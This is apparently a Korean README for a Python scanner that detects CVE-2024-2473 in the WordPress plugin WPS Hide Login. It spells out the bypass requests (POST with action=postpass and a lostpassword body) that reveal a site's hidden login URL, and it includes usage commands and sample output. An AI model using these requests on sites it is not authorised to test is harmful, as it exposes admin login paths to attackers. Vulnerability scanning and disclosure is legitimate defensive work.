
Wordpress 숨겨진 로그인 페이지 노출. WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473)을 실행하는 WordPress 사이트에서 로그인 페이지 노출을 감지합니다.
WPS Hide Login(≤ 1.9.15.2)을 실행하는 WordPress 사이트에서 로그인 페이지 노출(Login Page Disclosure)을 탐지하는 전문 Python 스캐너
Venexy 제작
WPS Hide Login은 관리자가 기본 /wp-login.php URL을 사용자 정의 숨김 경로로 변경할 수 있게 해주는 인기 WordPress 플러그인으로, '난독화를 통한 보안(security through obscurity)' 방식으로 작동합니다.
이 스캐너는 action=postpass 매개변수를 제공하여 플러그인의 보호 메커니즘을 완전히 우회하고, 인증되지 않은 공격자에게 숨겨진 로그인 페이지 URL을 노출시킬 수 있는 취약점인 CVE-2024-2473을 탐지합니다.
WPS Hide Login 플러그인은 WordPress 로그인 페이지를 기본 /wp-login.php에서 관리자가 선택한 사용자 정의 URL로 이동시킵니다. 그러나 1.9.15.2를 포함한 모든 이전 버전에서는 /wp-login.php 또는 /wp-admin/에 action=postpass 쿼리 매개변수를 제공하면 이 보호 기능이 우회되어 숨겨진 로그인 폼의 실제 action URL이 드러납니다. 즉, 인증되지 않은 모든 공격자에게 비밀 로그인 경로가 노출됩니다.
이 스캐너는 취약점의 공격 흐름을 세 단계에 걸쳐 재현합니다:
Phase 1 ─► Confirm target is a WordPress installation
│
▼
Phase 2a ─► POST /wp-login.php?action=postpass
with body: action=lostpassword&post_password=test
Check: HTTP 200 + lostpasswordform present + no wp-login.php in body
Extract hidden login URL from form action attribute
│
Phase 2b ─► POST /wp-admin/?action=postpass
Check: HTTP 302 redirect to location containing reauth=1 or /login
│
▼
Report hidden login URL if discovered
Phase 2a 또는 Phase 2b 중 하나라도 일치하면 대상은 취약(vulnerable) 한 것으로 표시됩니다.
requests 라이브러리1. 저장소를 클론합니다
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473
2. 의존성을 설치합니다
pip install requests
참고: Python 가상 환경 또는 Kali Linux를 사용하는 시스템에서는 다음이 필요할 수 있습니다:
pip install requests --break-system-packages
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]
| 인자 | 설명 | 기본값 |
|---|---|---|
-u, --url | 대상 WordPress 기본 URL (필수) | — |
# Basic scan
python CVE-2024-2473.py -u https://example.com
# Scan with custom timeout
python CVE-2024-2473.py -u https://example.com --timeout 15
# Scan over HTTP
python CVE-2024-2473.py -u http://192.168.1.100
...
┌─────────────────────────────────────────────────────────────┐
│ CVE-2024-2473 • WPS Hide Login Page Identifier │
│ Coded by Venexy | https://github.com/m4xsec │
└─────────────────────────────────────────────────────────────┘
===============================================================
TARGET https://example.com
TIME 2024-11-01 18:00:00
TIMEOUT 10s
===============================================================
[18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
[18:00:01] [+] WordPress confirmed — https://example.com
[18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...
[18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
+- Status : 200 Result : MATCH
[18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
+- Status : 302 Result : MATCH
###############################################################
## VULNERABILITY CONFIRMED -- CVE-2024-2473 ##
###############################################################
Plugin WPS Hide Login <= 1.9.15.2
Severity Medium (CVSS 5.3 / EPSS 93rd percentile)
CWE CWE-200 — Exposure of Sensitive Information
CVSS Vector AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N
[18:00:02] [VULN] Bypass confirmed via /wp-login.php?action=postpass
====================================================
HIDDEN LOGIN URL DISCOVERED
====================================================
>> https://example.com/my-secret-admin-path/
====================================================
이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용해야 합니다.
저자는 이 도구로 인해 발생하는 오용 또는 손해에 대해 책임을 지지 않습니다. 보안 평가를 수행하기 전에 항상 대상 시스템 소유자의 명시적인 서면 허가를 받으십시오. 승인되지 않은 시스템 스캔 또는 악용은 불법이며 비윤리적입니다.
책임감 있게 사용하십시오.
Venexy가 ❤️를 담아 제작
이 도구가 도움이 되셨다면 저장소에 ⭐🌟🌟🌟을 남겨주세요.
| 필드 | 세부 정보 |
|---|
| CVE ID | CVE-2024-2473 |
| 영향 대상 | WordPress용 WPS Hide Login 플러그인 ≤ 1.9.15.2 |
| 심각도 | 중간 |
| CVSS 점수 | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |
| CWE | CWE-200 — 민감 정보 노출 |
| EPSS 점수 | 0.10433 (93번째 백분위수) |
| 인증 필요 | 없음 |
| 공급업체 | WPServeur |
| 해결 방법 | 플러그인을 1.9.15.2보다 높은 버전으로 업데이트 |
-t, --timeout | HTTP 요청 시간 제한(초) | 10 |
| 리소스 | 링크 |
|---|